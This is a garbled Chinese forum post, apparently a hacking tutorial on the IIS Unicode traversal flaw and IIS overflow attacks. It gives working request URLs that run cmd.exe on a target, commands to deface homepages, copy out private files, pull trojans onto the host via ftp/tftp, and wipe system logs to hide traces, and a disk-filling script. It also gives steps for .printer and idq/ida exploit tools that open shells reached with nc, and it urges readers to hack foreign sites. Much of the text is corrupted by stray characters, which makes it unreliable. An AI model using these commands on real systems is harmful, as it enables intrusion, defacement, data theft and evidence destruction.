9 p: A3 D, @& }: c; k# Q5 n: s) {
下面开始正式学习:
4 f9 S, U [" O3 e
5 Z! V8 V5 g3 F9 S$ _& C
一,UNICODE漏洞的原理
" d5 ?+ o O) o* c2 s: j
1 C7 o& \. }8 J: ?2 Y8 V
此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中国台湾繁体中文也同样存在这样的漏洞。
8 U7 }3 J+ y1 P, @1 B% W7 W
/ A' L+ x) G2 H- c( s3 @
中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中
+ N1 a1 h$ s5 b" d
' |1 F+ d1 | `; ]
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = \'/\'
; s. O" B' [9 D3 f
) J4 Y! @9 w$ |' c4 S! w, D
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = \'\\\'
5 f1 W- I% T) u% l w5 n2 [6 W6 I
# k+ d) l& A3 s: k$ M. u0 X3 U, _
在NT4中/编码为%c1%9c
5 `( t7 i' I( ?& o# O3 X
& v1 O6 ^1 D [0 K/ [4 F
在英文版里: WIN2000英文版%c0%af
; U- t. _( z. e, j
2 r, W( E1 P& Y$ v' \# Z
在中文win2k里:%c1%1c
4 m) \' Q- w0 r. u% t9 u/ F& p, g
, x! `) k5 F4 Y) i2 r
此外还有多种编码,不一一阐述。
' _" [% ?) ?/ [
$ D- S0 a* ?5 o- K
本文例子均以win2k为准,其他类型请自行替换。
) H) ~% K# |" K" o5 o L
4 q% N* V' D( i6 |
基础知识(3)
! D2 v% n0 H" D+ A$ T3 b) A
0 ?% p0 a9 H/ x2 V! N# V
1 k3 d; b) T' c0 ^9 ~
二,一切从基础开始
; I7 g- }6 {2 _' T7 E
- O _# k# T9 s
由于wi t\\system32\\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)
' V/ K, A# a% {6 v
$ Y% l! N: l8 i$ W( |0 { l7 S
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+dir
+ }% x/ X' N8 d, i7 L% n
1 ^' b* b: Z/ ~$ Y
学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\\目录不合wi t同盘,或者目录级数有改动,可能会引起请求失败。
: @6 W2 @! ?7 F
$ r% r4 \! U# X: P' g
如果成功,那么在浏览区可看到如下信息:
2 Q( f% q$ Q# f, {
1 J! V6 H* f6 j' Y# B* i* y
Directory of C:\\inetpub\\scripts
, @1 x d ( N2 h+ X. ]
3 l" n( B3 H" n6 y$ e
2000-09-28 15:49 〈DIR〉 .
# k9 e+ y3 j* D
. |6 {% I2 a) g% \$ k
2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)
2 R- ~; a+ Z! p
8 ]% n+ q' k* r" m# g" Z1 J
是不是有自己机器的感觉了,正点!就是这种感觉!
, x, ?: H- r( [; g
' ?9 }1 o9 o7 F, O7 e
cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
& w c. L* m( q: j
, V N- F" x, y3 ~
... em32/cmd.exe?/c+dir (这个命令同样道理)
) T+ r& R. O# d
! ?% G% \/ ~. @* s. W
大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
& C! O) w6 J) |& J }( c6 A" ?1 _
% t" W! a- ~ O% y
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+copy+c:\\autoexec.bat+c:\\wi t\\auto.exe
- T& U P) L7 R
5 f1 x) \! V! S) i# f5 t: {
会dos的朋友一定懂其意义了,不懂的请去看书 .
. s6 `0 A- S* v8 T' B/ t& t0 o _
* \6 T: _4 u" n+ X
不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!
# T5 V5 ~8 x u- E* g
$ A. e) k2 c# v7 ^: G; ?
三,实战演练
$ k3 o5 u4 W9 I3 Z0 E3 D' H7 ^
4 m. b7 K% a3 o
1,修改主页!(是不是很爽?)
4 w0 e% H7 F# H
& t) ~4 z, M4 ~4 B0 [8 u' S
一般主页位置在c:\\inetpub\\wwwroot下,但要是改了路径,就需要找找了。
8 `+ x1 x& C+ \# f g9 }, f) k/ H) V7 v6 l {2 S" ^1 {
最方便的方法:在浏览器里输入
要是有漏洞,那在浏?..皇俏颐堑氖籽 ?/a
0 ~ a; D- z/ x M [% T6 K% M2 @$ O h
分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。
( ?8 A5 E m" y5 t' q
) A( f& M: B: ~# N" D
dir/s 法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。
5 [6 i9 S# Q- `9 j: I! h3 h
8 o6 A% C! l7 c% x
找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.a ,default.htm,defautl.html,default.a 中的一个,现在我们确定11.11.22.22中为index.htm z4 \) Z3 _. c
3 @: K; @2 }+ `' u' [9 s
那么我们就修改它吧!
3 e. _4 U4 u4 e# a2 H% _) d
5 h9 h N4 V: ?" G) P/ G
最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu c:\\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice c:\\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。
0 I; {' [7 [! a8 W+ U8 S
6 S& ~) h) G; A" J/ W9 J
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+echo+hackedbycshu+c:\\inetpub\\wwwroot\\index.htm
# z) U; M- S9 Y w
/ `; Q7 x% g+ g( `. N ' z
回应为:HTTP 500 - 内部服务器错误
- H$ J7 g7 D" b: Z6 p6 Q* O" ^' [% h
) D' [, I9 Y8 i
通过对cmd的分析,袁哥得出一条简便的方法,加入\符号
- F: a! k1 e) ^9 c, S+ u
1 u6 E2 H8 \3 ?7 a& P0 u" C8 T
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd\.exe?/c+echo+hackedbycshu+c:\\inetpub\\wwwroot\\index.htm
% u- q1 a) F# d) j5 H) l2 _$ d: P& ~
9 x5 i; x. s# J0 H/ m
11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd\.exe?/c+echo+2001730+c:\\inetpub\\wwwroot\\index.htm
3 M8 s: J' T' y, o2 D5 h2 Y6 X _0 ?7 _: }# V, M
回应为:cgi错误,不用理会
1 M9 \% D8 |; f: Y A) e' v8 i/ O% j) C
两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧
2 ?9 k) o6 @5 o, \' d
2 u* ]4 a) p" f! I' u
而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo
, ^4 o" K2 z! h' I0 N& V
8 T7 O' L) M5 H
例如:11.11.22.22/scripts/..%c1%1c../wi t/system32/cmd.exe?/c+copy+cmd.exe+c:\\a.exe
. `6 g4 B0 l9 ]+ u
$ ?0 S; @: B- w/ [* Q: j2 }
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+c:\\inetpub\\wwwroot\\index.htm
* C% ]4 a) o$ S" V
5 B! h7 S, A/ l( m( x. Q
2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页
当前离线
阅读权限
注册时间
2008-4-4
最后登录
2009-11-12
在线时间
2363 小时
甲级联赛职业球员, 积分 24609, 距离下一级还需 10391 积分
该用户从未签到
1444 点
发表于 2008-4-26 15:00:57
基础知识(4)
) _ _* `0 z2 u
( U- P/ f/ R g/ H& J
% I, P1 t1 m0 _1 c& `, L
上传,这个我们后面介绍。
, @6 e" A6 n6 i" Z9 O: m$ U
9 @/ F) h& \. d
几点忠告:
2 l# }# q% o) }, m |3 w2 V. ?( x
! E& ^: a- }9 [: e* i% O T; b8 k
1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德
1 o) h; W9 ~+ v8 j$ O
, u# Q% |5 {+ }2 ^- Y9 G
2,echo前记得帮他们做好备份
& D+ ?# o% z W! O. X# h
* P; y9 W2 O' i
3,不准在主页里加入恶性语句
- H0 h+ C& K) D" t
: h& F1 w' u' I+ [. O* w
2,下载文件
1 M& m& T* N, E' ?
' U. }) T. E$ m6 g
要是有什么有用的文件被你发现,那我们如何下载呢?
, f) Z" j2 g/ u# {. g
7 F! {1 w2 ~, t
最简单的方法:把文件copy至网页目录下。copy c:\\email\\baby.eml c:\\inetpub\\wwwroot\\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。
) P8 v% h4 y' [" e2 C! s# ~
" I, G6 K* s" v9 X+ V
别的方法:对不起,没想好:)
* V7 @) q( t- t" ?* L7 X
0 f! t, x( F" Q9 p# _
3,最重要的上传
2 \' n1 R- @7 t- m& P
$ P, a, g. F* Z3 v9 v
一般方法:ftp法
9 O) h" q. N, V7 u$ J, b
- v+ c/ Y& E9 @$ {1 ?( w
首先建一个ftp脚本文件:c:\\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧
! S. u4 h: p- T( P( S
$ d1 H% _6 @2 T* H6 k
echo+open ftp.cshu.com(ftp主机) c:\\hehe.haha
; o* k" M4 U0 j: y. N9 d8 v
9 @0 o/ e- g# c* T
echo+user yourname cc:\\hehe.haha (yourname是用户名)
1 q6 r. S' x; P! l* H) |
5 `' }" ^5 I: y2 h
echo+yourpa wd c:\\hehe.haha (yourpa wd是密码)
+ a4 [2 Y, H7 |/ D/ o
8 c+ b. R+ \# ^* P( F( U! s! G
echo+get setup.exe c:\\hehe.haha 要下载的文件
" k& N* ?' R8 U& ?9 n# y9 a0 _
8 H7 X: D7 ]$ O4 \0 F: I$ v0 Y
echo+quit c:\\hehe.haha
, H% H0 x0 B, u+ K- x# s: l
2 g+ [( B' ? Q# ^2 P5 S# p
完了以后:ftp+/s:c:\\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)
9 q5 v5 v4 v$ B. h- ]( S3 X
' K3 M/ W+ {* k$ G+ a
别忘了先上传到ftp主机,不要做马大哈哦!
6 ]" ^) R- O) `1 A* d* D
' S6 _+ E" y6 w J1 Q m) S
最简单的方法:tftp法。
, F! z" Y% j# Q" C: ` H
6 x" p5 ^3 ~1 _* C
这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)
8 j) T I6 n) i ]+ s3 ~
" `* y8 a/ N# I1 t$ G
在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)
0 ]' ?0 `1 C9 V/ r0 P* U1 V u
1 O& |7 t3 f: _! E1 ?7 y
***好后运行,别忘了设置好默认目录,否则会找不到文件
$ M: U1 d; K$ L" ]9 _0 T% Q
6 K2 R. n7 I7 ^4 w6 C) F
tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\\wi t\\ihateu.exe(ihateu.exe在默认目录里)
4 e) K5 Y1 {+ q8 A- H- @7 u
6 o# V, x, z7 P7 p+ f, ? [
1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!
+ |4 C$ l6 t- C, g" i4 P
; N, r* r+ x0 c3 |" }. ?. a& {
学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)
& v: b. o8 j! X& S+ x ?+ z& c
1 C3 {, {9 I. Z, w, a+ }
4,如何清除痕迹
- q0 a. _8 b6 L8 d2 ^. y) u
/ Y/ `' Y# X$ f' e4 X1 g
虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!
) V# A' J5 ?0 Y6 g
* _) W2 C; W/ |# Y
C:\\wi t\\system32\\logfiles\\*.*
) k/ k+ D5 ?: v [
0 o" Z0 k `% K
C:\\wi t\\ ytem32\\config\\*.evt
( x' C6 B& P# W5 R& I$ H; T
: @, H' H! v: e7 U
C:\\wi t\\system32\\dtclog\\*.*
( Y# b5 k" D5 c# P0 i% S
% D$ t5 E2 J7 }0 C
C:\\wi t\\system32\\*.log
5 e! I! A& \9 W, t r
3 H* g4 q+ w, P; C. `7 `8 D
C:\\wi t\\system32\\*.txt
1 } t. q! o; U
4 w" h7 u! \7 J# U: s
C:\\wi t\\*.txt
: F& P9 E- C& t: A0 F. u
% T. M6 e, g* q6 R' F7 f- ]
C:\\wi t\\*.log
2 ?) ~: n5 m' S" u
1 {. T7 T2 g, n1 U5 e A7 D
全……擦掉!
6 c/ P8 O5 f4 x, n! j
* y* |+ T9 X9 K8 r+ H
四,细节问题。
3 S( b1 e. U. |- s, D d" Y- {$ N+ `0 o+ }
1,遇到长文件名怎么办?
) t' d, i7 A U* h2 G1 C' R* Z& x
: g- w$ u6 _0 `& s8 Z% y; y* b
c:\\program files\\
: V% j" c+ `% x
% U8 ]+ A. ]" F0 H7 z
就用c:\\\" rogram20%files\\\
( @ B! ]* a P6 |" U% w, \
7 }1 D/ [6 T0 Y
2,遇到空格怎么办?
0 F" @- |; [, {/ ~
%代替喽,或者xx yy=xxyy~1
0 H: |( |: ]) E) I W; y5 Y
基础知识(5) `9 E4 S$ o- C& _5 I) W S
* @; A4 C' w3 G2 u& q, A
, e4 I1 c( ?3 \* [7 j
%代替喽,或者xx yy=xxyy~1
4 K8 c" B- c" l( f, @$ K/ N0 j
+ r7 u' T* M: J# S( W0 J0 a* H
3,如何做个很大的文件?
2 O# a! W( S3 T P# Z. P: R' K
+ k$ G" M/ M5 w
目的就是破坏啦!我不喜欢不过教教你们啦
, i: w A, \9 o& @
9 A! p- U( H$ v6 h
@echo off
, W/ A7 Z6 H1 W: C1 P- T* L
& ]7 l- a- h! T) q3 l4 j! ~
echo big c:\\a.a
8 e/ R) z' R& B) z9 N+ S8 v+ L( v$ i5 w. t
* Y1 _: O v0 W0 _
; o) N3 D5 m, `8 g
3 F# f6 X2 k9 k
copy c:\\a.a+c:\\a.a c:\\a.a
& O7 K- B; ^+ }1 h( b! d
9 f6 ]/ C% n9 o W4 O5 U& j- m
! L. ~8 c3 V" f/ }8 p0 `
6 V& e B/ C( n5 N2 ]' H
注意不要乱来啊!
3 X4 e/ Z8 x) q# Y5 f6 F3 |) _; S
2 O2 Z0 c' ?9 o
4,输入命令,没反应或反应不对。
2 o7 S7 L# v7 X% c- K6 A i% w# I4 N2 l4 U: I* w5 }
:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!
, }$ A8 K' I) ]
% b- \0 N Z + ^$ l d, v2 z5 X
... macr;..&am Agrave;
" Z! b+ n/ y; P6 ?, E0 F+ ~" V$ l
../wi t/system32/cmd.exe?/c+dir+c :\\ 或
... 2/cmd.exe?/c+dir+c:\\ 或
... 2/cmd.exe?/c+dir+c:\\ 或
... 2/cmd.exe?/c+dir+c:\\
' R; z$ J! {+ {# a
8 g* n8 ]3 _) n
不一定有用哦!
6 o8 m: ?6 p5 A# \/ d
8 ?5 T0 h0 ^, d" m7 `1 L1 e
5,如何找到unicode漏洞的主机
( T: Q" l1 p. D G9 }& w
" P, T- g8 s- Q3 @3 S
呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)
: D1 W! R# n9 W1 U8 S' x
7 P( l) T/ B( R3 `7 p2 K
不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!
( N: @, X* _# Z( q* b( w# g% o& G
& `, l+ r. `7 v, e& D3 @+ l
6,我copy,del文件,怎么显示acee denined?
7 n% F: h* F- ~5 H
% }" h2 q- B0 w8 F
这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!
" G# Q. X2 Z* E; O
/ A ]* l% L% I( _; S/ {5 f
这个我会在今后介绍,现在你可以试试attrib
% x5 ]8 X5 O/ t4 \! X7 }
, h: _0 a2 ~) k8 }
attrib -r -h -s c:\\autoexec.bat
" u7 j, e/ |( m }2 D" Z7 d# K
, x8 z7 C) G5 [( d+ {
再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!
- t: J( @3 [ T
$ f( `, c, {0 T! U. B: D. t5 l
7,我黑了主页,天下无敌?
) {. t. S- U5 i, n, u8 {+ Z, `! s
( {/ A$ `9 ]/ T. Y( l& S P5 o6 ^
我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口
0 G1 i. w7 t* X- }- O1 R3 B9 \) N/ f& m
$ ~% {- o6 i1 w2 `) f7 r
echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!
! W E+ R8 {$ p5 E( k3 N; t. }1 m
8 W/ b, m! ^4 R. i) s
对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!
9 `) ^, o4 j7 E5 I
6 M o7 B" }1 S
要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择
/ y' m B; t7 u5 B& h: a
; q- o; n2 p# w" y
8,我如何做更多的事?
( W5 y- D$ w0 T) h& e( v2 T i K6 A1 M/ q$ J o
第一,努力提高权限
" o% Z8 F& ?. N6 O
! A/ O! ^- @* `. |9 g2 R R
第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!
2 c5 Q) F [; H& T$ i6 e6 L
' U$ u; Y Q x, J, B+ L
* q0 n, g7 {: v8 ~7 N
一,frontpage扩展攻击。
7 g: L) c/ U5 n
7 `: |- i& }5 L W j2 o2 S ^
为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管注意文明用语的疏忽(为什么注意文明用语满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢注意文明用语网管和微软啊!
% F2 P6 Q6 m( Y4 i J' e E& O" h q
具体做法:
( s9 G. Z$ t: V4 T9 y/ K% i
; K3 L9 i+ u# I
1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。
* ]$ Y2 v! }& A8 e8 t$ O$ d
5 W( u" o0 z8 `3 {& O F2 M
2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。
$ j+ ~- f7 {% v8 v0 r
. f; ]8 R) m+ M/ C1 N
3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!)文件菜单下选择“打开站点”,然后在文件夹框里写入
(我习惯用这个做例子,以...僮魍?澄募?恕?/a
- |# X7 k; H ?' V! c
; `5 f7 D4 Z4 y; I8 [! x$ d4 Q
4,万一跳出错误信息,表示有密码(这个不算注意文明用语)这时我们试着用以下url,
,这...盎箍梢愿耐?场?/a
+ j W+ V+ w' K1 R) i# k
. T3 t8 D6 g' }- L" Y. m
我的看法:
; x" U0 e" N V. E7 D, a; `+ s. w
4 J& P! R9 T3 \
这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。
8 f4 Y 0 f! S' S+ z- k0 }/ ]
. L' w0 `" P/ c3 ^2 n4 E
二,iis.printer溢出攻击
* G: d5 G7 U9 d4 ~* B
5 d3 \6 ?# j" k9 {* L; M# g
据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!
# L' _5 P6 k) i$ V' R E! X" C8 A7 Q1 {5 G* {2 ?( `
具体原理我也不是很清楚,只能说个大概:当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的“非法操作”其实也是可能是由于溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了,因此……溢出攻击是非常强大的! }- q+ O& K( Q, r0 ^& w
, D+ v8 F) W: I
由于汇编对于我们来说较难掌握,加之对溢出的了解很有限,那么我们只能借助高手们的程序来黑了。
9 ]* [5 B! g* w% |
4 Z, _8 ?6 f0 j8 T0 n8 b4 B
具体方法:
; h8 c& H8 p1 \: M! p' m
* y; O/ ?7 I+ B3 i9 l" ^6 H
1,准备iishack,本站有下载,该版本可以对多种系统进行攻击。
3 X9 ~1 X% W) L2 _
* b* m- O$ C8 d: k
2,用x-scan或流光扫描一个有iis.printer漏洞的主机,然后就可以攻击了。
( w$ v/ b% k+ P% S5 @. p. ^
( Z. K3 @# z. W+ i
3,在命令行方式执行iis5hack (主机ip) (端口号,默认80)(系统代号,具体可参考程序的说明) ( shell口)
, T! n4 {2 a8 H4 `# ?2 `
- M: w% v y3 ?/ \+ q
例如:iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)
5 @- U$ w# B0 F3 h2 {% b3 p- `
3 |4 k5 d) t! ^& Z. }6 M0 P" L: w
4,用nc或telnet连上,nc/telnet 11.11.22.22 111,成功的话就可以控制机器了,加个用户,做个代理……
% b' @; Y$ S+ c& x3 z
( [; U# @% a: ~& o0 o
我的看法:
8 o3 T: l# O, _6 T, w2 B& J
) x$ h3 e2 |' h& ]
这算是一个比较有用的漏洞了,它能帮助我们取得system权限,其实和admin差不了多少了,对于做一台跳板是非常有利的,希望大家熟练掌握。
3 r# s) N* z4 A( }! O! C! G
+ c% ]! D0 T& U3 l3 _
三,idq/ida漏洞溢出攻击
. V& V2 o: h9 e \- f
3 F; ?, f- t( g- l5 k) P, r2 G
这是时下很热门的了,原理和上面的printer相似,目前我只找到了iis5的攻击程序,在cshu里也可以找到的,我们准备的是 ake的gui版本,很方便的。
' D B' Z5 M. S* L" K* M
9 q! w+ _8 r! K* N
具体方法:
6 U% ]: B# ^1 H/ ] r2 d+ B+ I 0 d
1,准备 akeiis溢出程序。可以从本站下载。
) }4 _, Q+ p) M: S% c3 p
8 J# r8 V% k- K% n) z. @/ f# c; c
2,ida/idq漏洞很多的,但win2k的服务器就不是那么普遍了,所以用你熟练的扫描器去找一打win2k的机器吧。
$ d2 ^0 j* ^0 Y6 W
+ `2 y- j* b- m) W7 z$ o5 s
3,程序的界面是很傻瓜的,把ip填入,选择好类型,按下溢出按钮,显示shellcode发送完毕。
. ?1 k* x4 q, N" G9 Y
/ _. M4 Z5 [; A& e4 `
4,telnet/nc到你设定好的端口,如果成功的话,会显示目录下的信息(因为默认shellcode是dir)
) a; N. M7 e: D
2 X* s+ }0 ^, L l4 R
5,欢呼吧!再次溢出,别忘了改shellcode为你想 信息提示
您的同一ip请求过于频繁,如果希望继续访问,请输入验证码:
Copyright 1998 – 2010 Tencent. All Rights Reserved.

参考资料

 

随机推荐